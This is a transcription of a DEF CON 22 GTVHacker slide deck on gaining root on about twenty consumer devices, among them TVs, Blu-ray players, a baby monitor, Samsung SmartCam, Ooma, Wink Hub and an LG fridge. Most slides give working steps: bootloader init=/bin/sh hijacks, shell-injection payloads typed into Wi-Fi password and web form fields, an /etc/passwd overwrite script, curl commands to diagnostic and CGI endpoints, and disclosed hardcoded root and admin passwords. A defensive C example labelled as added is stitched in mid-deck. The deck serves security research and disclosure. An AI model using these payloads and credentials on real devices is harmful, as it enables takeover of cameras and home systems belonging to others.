GTVHacker

• Formed to root the original Google TV in 2010
• Released exploits for every Google TV device
• Plus some others: Chromecast, Roku, Nest
• Many more to come!
Speaking Members

Amir Etemadieh (@Zenofex) - Research Scientist at Accuvant LABS, founded GTVHacker

CJ Heres (@cj_000) - Security Researcher / Group Head, Technology Development [somewhere]

Hans Nielsen (AgentHH) - Senior Security Consultant at Matasano

Mike Baker ([mbm]) - Firmware developer, OpenWRT co-founder
Other Members

gynophage - He's (again) running a little thing called the DEFCON CTF right now

Jay Freeman (saurik) - Creator of Cydia

Khoa Hoang (maximus64) - I

Tom Dwenger (tdweng) - Excellent with APK reversing and
Why Hack ALL The Things?

We own the hardware, why not the software?
Give new life to abandoned hardware
Make the product better
We enjoy the challenge
Takeaways

Learning is awesome, but this presentation is about the

You get a root!
• You get a root!
• You get a root!
Everybody gets a root!
Avenues Of Attack

UART

Universal Asynchronous Receiver/Transmitter

• Interacts with debug ports on the board.
• One wire for transmit (TX), one wire for receive (RX), one wire for ground
• Works at different voltage levels, for example: 1.8V, 3.3V, 5V
• Free UART adapters at the end!
Device

Epson Artisan 700/800 (Printer)

Networked all-in-one photo printer / scanner

ARM
Linux 2.6.21-arm1
Epson Artisan 700/800 (Printer) - UART

Booting with UART connected drops to a special console.

Console has root command execution as a feature.

    Launching Console Menu
    <Current: WLAN mode>
    Input: 'R' 'a' 'm' 'f' 'w' 's'
    Reboot*
    Reset settings and reboot*
    display current IP address*
    display current MAC address*
    show /proc/meminfo*
    run shell command
    List current module status
    WebService status print
    statussheet output
    enter shell command:
Belkin Wemo

Internet Controlled Wall Plug

Multiple exploits in the past year

Device: Belkin Wemo

• UART was patched, according to the Internet. Not entirely true!
• Still accepts commands for two seconds in recovery.
• Run this command at the right moment:

    kill -9 $(ps | grep 'reboot' | sed -r -e 's/^ *([0-9]+).*/\1/')
Greenwave Reality Smart Bulbs

"Smart" lighting system

Gateway plugs in and uses RF to communicate with bulbs

Philips Hue Competitor

PowerPC Embedded Device

SSH server on startup, password was unknown.

Greenwave Reality Smart Bulbs - UART

115200 8n1 - Console Login

Greenwave Reality Smart Bulbs

Device ships with an open U-Boot installation

Root via changing U-Boot command line.
- Connecting to UART and accessing bootloader shell.
- Adding init=/bin/sh into kernel cmdline
Now we have a root shell over our UART.

• To maintain access, we cracked the root password: "thinkgreen".
File Transporter

Advertised as "Your own private cloud"

Essentially a cloud connected NAS

Started on Kickstarter, bought by Drobo

ARM
Linux 2.6.35.12
Buildroot-based userland

File Transporter - UART

38400 8n1 - Console Login

File Transporter - Open Bootloader

• We can access U-Boot over the UART, allowing us to hijack the init process.
• By using init=/bin/sh, we now have root access and can change the root password to allow login.

FROM THE BOOTLOADER SHELL:

    setenv oldargs ${addargs}
    setenv rootargs init=/bin/sh mem=256M console=ttyS0,38400 rootwait user_debug=31
    setenv addargs ${rootargs}
    saveenv
    run bootdisk

FROM THE ROOT SHELL:

    mount /proc
    passwd root
Vizio CoStar LT (ISV-B11)

Media Player w/ HDMI Passthrough

Successor to the CoStar (Google TV)

Not a GoogleTV!

Vizio CoStar LT (ISV-B11) - Hijacking Kernel Initialization

On boot, looks for a FAT32 drive with either "fs.sys" or "safe-kernel.img1".

"fs.sys" is a U-Boot script image which contains U-Boot commands executed on boot.

Modifying the kernel command line lets us hijack kernel init and get root.

Can use a combination of the two files to boot a new kernel entirely.
Device

Staples Connect

400MHz ARM SOC
WiFi, Zigbee
Cloud-based

Home Automation Hub

Rebadged Zonoff

Linksys Branded

Works with many types of HA devices

Staples Connect - UART

Staples Connect - U-Boot

• Short out NAND pins 29/30 to ground after powering on - corrupts U-Boot environment
• Prompt timeout is set to default and allows user input!
• Run the commands below, boots to a root console.

    setenv bootargs "console=ttyS0,115200 init=/bin/sh [...]"

• Persistence: modify and saveenv in U-Boot and/or edit /etc/rc.local, add:

    # dropbear -d 222

• SSH password is root:oemroot
eMMC

(Chip photo: Toshiba eMMC Embedded Memory 16GB)

Embedded Multi-Media Card

• Basically an SD card on a chip.
• Handles error correction on the hardware, so no fiddly math needed.
• All done with cheap multimedia readers!
• Can usually get pin breakouts from nearby resistors
Rooting w/ SDCard Reader/Writer

How do you find the pinout?
- Board Design (traces and labels)
- Intuition
- Logic Analyzer
- Pull the chip and trace!
Amazon FireTV

Quad Core 1.7GHz Snapdragon 600

8GB eMMC Flash

FireOS 3.0 (modified Android 4.2.2)

Amazon FireTV

eMMC Pinout

UART Pinout (1.8V)
Hisense Android TV (Google TV)

Marvell MV88DE3108 Quad Core CPU
Android 4.2.2

A newer SOC compared to last year.

At DEF CON 21 we demonstrated how to bypass secure boot on the entire SOC family

Hisense Android TV (Google TV)

Mount the "factory_setting" partition.
- /dev/mmcblk0p3
- Persists between boots.

    # chmod 4755 su

- Could also use SuperSu or similar.
Pro Tip - Don't say:

"[X] has never been hacked"

"A refrigerator has never been hacked." - USPS
https://youtu.be/HiWjfWb3bNc

US Postal Service is at the forefront of refrigerator security.

Took this as a challenge.

Got parts, as it's a $3000 refrigerator.
LG Smart Refrigerator (LFX31995ST)

Android 2.3

Brains of the fridge
Controls ice, compressor, water

WiFi, USB, SD Card

LG Smart Refrigerator (LFX31995ST)

UART - Boots to root console!

eMMC - Success. Mount system, insert stock Android launcher and superuser binary.

ro.secure=0, device already has su.
Command Injection

• User input can't be trusted.
• Don't use shell commands.
• Never trust user input.
• At least escape your shell commands.
• system() counts too.

• "ls %s" with the parameter ";reboot;" gives "ls ;reboot;", causing a reboot.
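The "ls %s" / system() pattern above, as an added example that is not from the GTVHacker slides: the unsafe shape beside a hardened version that allowlists the argument and execs /bin/ls with a fixed argv, so no shell ever parses the input. The function names (list_dir_unsafe, is_safe_dir_arg, list_dir_safe) are my own; the same unsanitized-string-into-system()/passthru() bug is what the Panasonic, Ooma, Samsung SmartCam and Wink Hub slides below rely on.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The pattern the slide warns about: user input is pasted into a format
 * string and handed to system(), so ";reboot;" becomes "ls ;reboot;" and
 * the shell runs both commands. Kept only for comparison; never call it
 * with untrusted data. */
int list_dir_unsafe(const char *user_dir)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "ls %s", user_dir);
    return system(cmd);
}

/* Allowlist check: a directory argument may contain only [A-Za-z0-9._/-],
 * must be non-empty, must fit the buffer, and may not contain "..".
 * Everything a shell treats specially (; | & $ ` ( ) < > space, quotes,
 * newline) is rejected outright rather than escaped. */
int is_safe_dir_arg(const char *s)
{
    if (s == NULL || *s == '\0')
        return 0;
    size_t len = strlen(s);
    if (len > 200 || strstr(s, "..") != NULL)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '/' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened version: validate, then fork and execv /bin/ls with a fixed
 * argv. No shell is involved, so metacharacters in user_dir would only
 * ever be bytes inside argv[2], never command separators; "--" stops a
 * leading "-" from being parsed as an ls option.
 * Returns ls's exit status (0 on success), or -1 if the argument was
 * rejected or the child could not be run. */
int list_dir_safe(const char *user_dir)
{
    if (!is_safe_dir_arg(user_dir))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ls", "--", (char *)user_dir, NULL };
        execv("/bin/ls", argv);
        _exit(127);                       /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed sample inputs: one benign, three injection attempts. */
    const char *inputs[] = { "/", ";reboot;", "$(reboot)", "../etc" };
    for (size_t i = 0; i < 4; i++)
        printf("%-12s -> %d\n", inputs[i], list_dir_safe(inputs[i]));
    return 0;
}
```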
Vizio Smart TVs (VF552XVT)

BCM97XXX-based Yahoo Powered Smart TV

Platform is still widely available

One of the last full array backlit LED TVs.

Smartness is thin, the TV isn't.

Vizio Smart TVs (VF552XVT)

(Screenshot: "Connect to Access Point" dialog, WPA AES, "Please enter your WPA Pre shared key", Connect / Show Keyboard)

CI via WiFi password - spawns a shell over a USB UART.

• Enter this:

    ;mknod /tmp/gtvhacker c 188 0;

• Then this:

    ;bash 2>/tmp/gtvhacker>/tmp/gtvhacker</tmp/gtvhacker; bash;
Sony BDP-S5100 (Blu-Ray Player)

Blu-Ray Player
MTK8500 Chipset

Runs Linux

WiFi, Netflix, VUDU, etc

LG BP530 (Blu-Ray Player)

Blu-Ray Player
MTK8500 Chipset

WiFi, Netflix, VUDU, etc.

LG BP530 / Sony BDP-S5100 (Blu-Ray Players)

• Bug in the MTK supplied SDK, many players affected!
• Put an empty file named "vudu.txt" in a folder named "vudu" on a flash drive.
• Also create a "vudu.sh" containing:

    mount -t overlayfs -o overlayfs /etc/passwd
    echo "root::0:0:root:/root:/bin/sh" > /etc/passwd
    /mnt/rootfs_normal/usr/sbin/telnetd

• Once VUDU is run, it'll execute the shell script as root, and you can connect via Telnet.



http://DC22.GTVHACKER.COM

Device

Panasonic DMP-BDT230 (Blu-Ray)

Blu-Ray Player
MTK8500 Chipset

Runs Linux

WiFi, Netflix, VUDU, etc

Panasonic DMP-BDT230 (Blu-Ray) - UART

115200 8n1 - Console Output
Panasonic DMP-BDT230

Network folder name isn't sanitized prior to use.

Injected commands run as root.

(Screenshot: Network Drive List / Network Drive Settings - "Enter the following items and select "Connect" to access a network drive." Fields: IP Address, Shared Folder Name, User ID, Password, Connect. One field holds the injected value, truncated on the slide:)

    $(/mnt/sdta1/busybox teln
Motorola RAZR LTE Baseband

Baseband is isolated from main CPU - totally separate piece of hardware.

Controls all cell network communications.

Also runs an ARM processor with Linux.

Motorola RAZR LTE Baseband

• Baseband listens on an internal network, limited shell accessible on port 3023, diagnostic script on 3002.
• As seen in said script: AWK injection! (line truncated on the slide)

    busybox awk '{print substr("'"${outFilePath}"

• Lets us get a root shell on the baseband. Injected value for outFilePath (truncated on the slide):

    x",0,1);system("
PogoPlug Mobile

Online backup / cloud storage, < $10

Plug in USB drive / SD card, auto-upload to the cloud

Marvell Feroceon ARM SOC

Linux 2.6.31.8

PogoPlug - UART

115200 8n1 - Open Bootloader & Root Shell

PogoPlug Mobile - Command Execution

/sqdiag/HBPlug

(Screenshot: "CloudEngines Diagnostics : HBPlug" page; left menu lists BGQueue, EM-MAIN, EM-SVC, HBPlug, HOTPLUG, Logging, SVCMUX, SVCTable, SYNC, TCP-MAIN, TCP-SVC, Threadpool; panel "HBPlug Diagnostics")

PogoPlug Mobile - Command Execution

/sqdiag/HBPlug?action=command

(Screenshot: the same diagnostics page with an "Execute Command" form under "HBPlug Diagnostics")

    curl -k "https://root:ceadmin@IP_ADDR/sqdiag/HBPlug?action=command&command=reboot"
Netgear Push2TV (PTV3000)

PureVu CNW6611L Secure Media SOC

Screen Sharing Device
• Miracast
• Intel WiDi

Netgear Push2TV - UART

Netgear Push2TV (PTV3000)

Via UART, press space at boot to interrupt U-Boot - run your own commands.

UART again, root console is active for 2-3 seconds after booting.

Command injection in web interface via box nickname - command will run as root.

SPI flash chip holds U-Boot commands, can be reflashed to run custom ones.
Ooma Telo

VOIP Router

Running OpenWRT based distro with Freeswitch

Assists in connecting to Ooma Network for VOIP Calls

ARM processor

Linux 2.6.33.5

Ooma Telo - UART

115200 8n1 - Console Login

Ooma Telo - CI in Web Portal

• SSH already running!
• Need to add SSH port to iptables so we can access it.
• Command injection in the Ooma Telo Portal.
• No sanitization done on Server IP before running a command on the backend.
• Root password is "!ooma123", password crackers are fun.
• By default page is only accessible through LAN.

Ooma Telo - CI in Web Portal

(Screenshot: Ooma Telo web portal, Version 86988. Menu: Wireless, Home Network, Advanced, Ringtones, DECT, Bluetooth, Status, Tools. Tools > Bandwidth: "Bandwidth Measurement Tool", Iperf Server Details with fields Server IP Address, Port, Protocol, Time Duration (sec), Run Test; also Port Scan and DNS Test. The Server IP Address field holds the injected value.)

Enable SSH on LAN:

    x.com $(iptables -t filter -A LAN_SSH -j ACCEPT)
Netgear NTV200-100NAS

Media Streaming Device

Adobe Flash-based
S10-S0 (cheap!)

WiFi

Secure Broadcom SOC
Encrypted updates

Netgear NTV200-100NAS

Updates are signed and encrypted

App installation isn't, and is done over unencrypted HTTP.

Man-in-the-middle the app installation!
- Grab a copy of an app
- Add a malicious symlink
- Repack and host app locally
- Run the app
- Modify the app again, this time adding a shell script inside the symlink to call telnet

Run the app again, reboot, and now you have persistent root!




Device

ASUS Cube (Google TV)

Marvell 88de3100 SOC
Dual Core 1.2GHz ARM
Google TV!

We released CubeRoot for the Cube and additional exploits for the Marvell SOC (secure boot) at DEF CON 21.
ASUS Cube (Google TV)

Built-in Media app can mount SMB shares (Windows file sharing) with no restrictions.

Root procedure:
- Create a SMB share with a su binary.
- Use the media app to connect to the SMB share.
- adb into the Cube, run the su binary - you are root!
- From here, remount system, install SuperSu and win.
Summer Baby Zoom WiFi

WiFi baby monitor
Custom RF for remote
Marketed as "Secure"

(Screenshot: Google Play listing for the "Summer Link" app by Summer Infant, Media & Video, Installed)
Summer Baby Zoom WiFi - Hardcoded Username & Password

Found this interesting base64 encoded string and function calls in "snapcam" binary

    addiu   $a1, (afxndqgrtmw4hok - 0x4E0000)  # "fXNDQGRtMU4hdkF1dGgzbnQxV0BUNw=="
    addiu   $a2, $sp, 0x18
    la      $t9, _ZNSsC1EPKcRKSaIcE           # std::string::string(char const*, std::allocator<char> const&)
    nop
    jalr    $t9 ; std::string::string(char const*, std::allocator<char> const&)
    addiu   $a0, $sp, 0x20
    lw      $gp, 0x10($sp)
    li      $v0, 6
    sw      $v0, 0x34($sp)
    la      $t9, _ZN6Gemtek14setEncUserPassESs  # Gemtek::setEncUserPass(std::string)
    lw      $a0, 0x64($sp)
    jalr    $t9 ; Gemtek::setEncUserPass(std::string)

Decoded: MsC@dmln!:Auth3ntlc@T3
Summer Baby Zoom WiFi - Hardcoded Username & Password

• Calling "nvram show" from the command line produces the following list of users
• 2 of the users have passwords that change between each cam
• Also note the pass seen hardcoded in the snapcam binary.

    UserSetSetting.userList.users0.password=PFCCLALLDBBR
    UserSetSetting.userList.users0.privilege=0
    UserSetSetting.userList.users0.username=V13w3r
    UserSetSetting.userList.users1.index=3
    UserSetSetting.userList.users1.password=Auth3ntlc@T3
    UserSetSetting.userList.users1.privilege=1
    UserSetSetting.userList.users1.username=MsC@dmln!
    UserSetSetting.userList.users2.index=4
    UserSetSetting.userList.users2.password=PFCCLALLDBBR
    UserSetSetting.userList.users2.privilege=1
    UserSetSetting.userList.users2.username=SnApAdmln

Users and passwords on camera from "nvram show"
Summer Baby Zoom WiFi - Command Execution

SystemGT.cgi is accessible with admin credentials. The "SystemGT" POST var gets directly executed with system() as root.

    la      $a1, 0x430000
    la      $t9, sprintf
    addiu   $s0, $sp, 0x200+var_168
    addiu   $a1, (aS_0 - 0x430000)     # "%s & "
    move    $a0, $s0                   # SystemGT POST var
    jalr    $t9 ; sprintf
    addiu   $a2, $sp, 0x200+var_1E8
    lw      $gp, 0x200+var_1F0($sp)
    nop
    la      $t9, system
    nop
    jalr    $t9 ; system
    move    $a0, $s0                   # SystemGT cmd
    lw      $gp, 0x200+var_1F0($sp)
    b       loc_41C9D4
    nop

/bin/mini_httpd for "SystemGT.cgi"

    curl -u 'MsC@dmln!:Auth3ntlc@T3' "http://IP/cgi-bin/systemGT.cgi" -d "systemGT=telnetd"
This is DEF CON 22, right?

Samsung SmartCam

TI DaVinci ARM SOC
Linux 2.6.18

• Network camera w/ mic and speaker.
• Mobile phone app for remote access.
• Web interface for local access.

Samsung SmartCam - UART

Pins: GND, RX, TX, VCC

115200 8n1 - Console Logging Only
Samsung SmartCam - PreAuth

    }else if($pageData[0] == "NEW"){
        $result = requestToCamera(CMD_USER, ACTION_GET_ALL, TYPE_REQUEST, null);
        if($result[0] == "OK" && $result[1] != null){
            $recvData = $result[1];
            $sendData = array_slice($recvData, 0, 40);
            str2byte($sendData, $pageData[1], 17, 16);
            requestToCamera(CMD_USER, ACTION_SET, TYPE_REQUEST, $sendData);
            $_SESSION["PRIVATE_KEY"] = $pageData[1];
            echo "OK";
        }else{
            echo "NOK;" . $result[1];
        }
    }

CGI script normally does an auth check, but not on a new user.
Can reset the admin password without knowing the user's password.
Only accessible over the LAN.
Samsung SmartCam - CI

• WEP key is not sanitized for shell commands.
• Set up a WEP key with an injected command, then re-attach a network cable to trigger the bug.
• Can also be exploited without any physical access if the device is connected over WiFi.
• Web interface runs as root!

Samsung SmartCam - CI

(Screenshot: Setup > Network Setting > Wireless Network page of the SmartCam web interface. "Other WiFi Networks", Security: WEP selected. Network SSID: HACKALLTHETHINGS, Password: $(busybox telnetd -l/bin/sh) - the injected command.)

Enable root telnetd: $(busybox telnetd -l/bin/sh)

BlueTooth, WiFi, Zwave and Zigbee

TI CC1101 (RF SDR)

Great cheap "RF Toolkit"
Wink Hub

• Smart home "gateway"
• Allows integration with multiple smart home devices.
• Mobile application to control ALL THE THINGS
Wink Hub - Command Injection

    <?php
    $nodeId = $_POST['nodeId'];
    $attrId = $_POST['attrId'];
    $v = $_POST['value'];
    //$who = exec('whoami');
    //echo $who;
    //passthru("sudo ls", $retval);
    //echo "nodeId=" . $nodeId . " attrId=" . $attrId . " value=" . $v;
    $cmd = 'sudo ' . dirname(__FILE__) . '/php2apron set_value ' . $nodeId . ' ' . $attrId . ' ' . $v;
    //echo $cmd . "
    passthru($cmd, $retval);
    echo "ret_code=" . $retval;
    ?>

The "set_dev_value.php" script doesn't shell-escape the POST fields "nodeId" and "attrId"
• Used in a command with "sudo"
Demo

4 minutes, 22 devices, 1 special guest
Welcome DUAL CORE!

"All The Things"

Dual Core CDs available in the vendor area

Questions

We'll be doing a Q&A after the talk at the Chillout Lounge

http://DC22.GTVHACKER.COM

WIKI: http://www.GTVHacker.com

Thank You

Slide resources can be found at:
http://DC22.GTVHacker.com/

FORUM: http://forum.GTVHacker.com
BLOG: http://blog.GTVHacker.com
IRC: irc.freenode.net #GTVHacker
Follow us on Twitter: @GTVHacker

Shoutout to:
DEFCON
Dual Core
ddggttff3
radix
minga
0x00string

And all of you!